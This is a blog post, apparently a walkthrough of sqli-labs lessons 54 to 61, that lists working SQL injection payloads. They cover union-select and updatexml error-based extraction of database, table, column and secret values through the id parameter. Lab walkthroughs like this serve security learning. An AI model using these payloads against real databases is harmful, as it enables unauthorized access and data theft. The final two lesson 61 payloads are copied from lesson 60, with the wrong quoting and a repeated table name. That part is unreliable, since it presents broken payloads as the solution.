lesson54_61

发表于 2022-02-08 更新于 2025-07-28 分类于 sql注入

lesson54

一般的联合查询注入，但只有十次机会

?id=1

QQ截图20220218184638.png

?id=1’ order by 3–+

QQ截图20220218184904.png

?id=1’ order by 4–+

QQ截图20220218185026.png

?id=-1’ union select 1,2,3–+

QQ截图20220218185205.png

?id=-1’ union select 1,2,database()–+

QQ截图20220218185315.png

?id=-1’ union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()–+

QQ截图20220218192118.png

?id=-1’ union select 1,2,group_concat(column_name)from information_schema.columns where table_name=’t87qfwjwea’–+

QQ截图20220218191401.png

?id=-1’ union select 1,2,group_concat(concat_ws(0x7e,sessid,secret_X1KA))from challenge.t87qfwjwea–+

QQ截图20220218192008.png

唯一要说的就是这关如果注入超过十次，表名和字段就会变非常恶心

lesson55

?id=-1) union select 1,2,database()–+

?id=-1) union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()–+

?id=-1) union select 1,2,group_concat(column_name)from information_schema.columns where table_name=’7lyan613nt’–+

?id=-1) union select 1,2,group_concat(concat_ws(0x7e,sessid,secret_W8HV))from challenges.7lyan613nt–+

lesson56

?id=-1’) union select 1,2,database()–+

?id=-1’) union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()–+

?id=-1’) union select 1,2,group_concat(column_name)from information_schema.columns where table_name=’lby5b1quon’–+

?id=-1’) union select 1,2,group_concat(concat_ws(0x7e,sessid,secret_6JN1))from challenges.lby5b1quon–+

lesson 57

?id=-1” union select 1,2,database()–+

?id=-1” union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()–+

?id=-1” union select 1,2,group_concat(column_name)from information_schema.columns where table_name=’2by8hxznwc’–+

?id=-1” union select 1,2,group_concat(concat_ws(0x7e,sessid,secret_LXMN))from challenges.2by8hxznwc–+

lesson58

?id=1’and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+

?id=1’and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)–+

?id=1’and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=’6kkc70flk9’),0x7e),1)–+

?id=1’and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,sessid,secret_JXDL))from challenges.6kkc70flk9),0x7e),1)–+

lesson59

?id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)–+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=’062lvunx5i’),0x7e),1)–+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,sessid,secret_2XKL))from challenges.062lvunx5i),0x7e),1)–+

lesson 60

?id=1”) and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+

?id=1”) and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)–+

?id=1”) and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=’qlbva5vmrz’),0x7e),1)–+

?id=1”) and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,sessid,secret_JCJO))from challenges.qlbva5vmrz),0x7e),1)–+

lesson 61

?id=1’)) and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+

?id=1’)) and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)–+

?id=1”) and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=’qlbva5vmrz’),0x7e),1)–+

?id=1”) and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,sessid,secret_JCJO))from challenges.qlbva5vmrz),0x7e),1)–+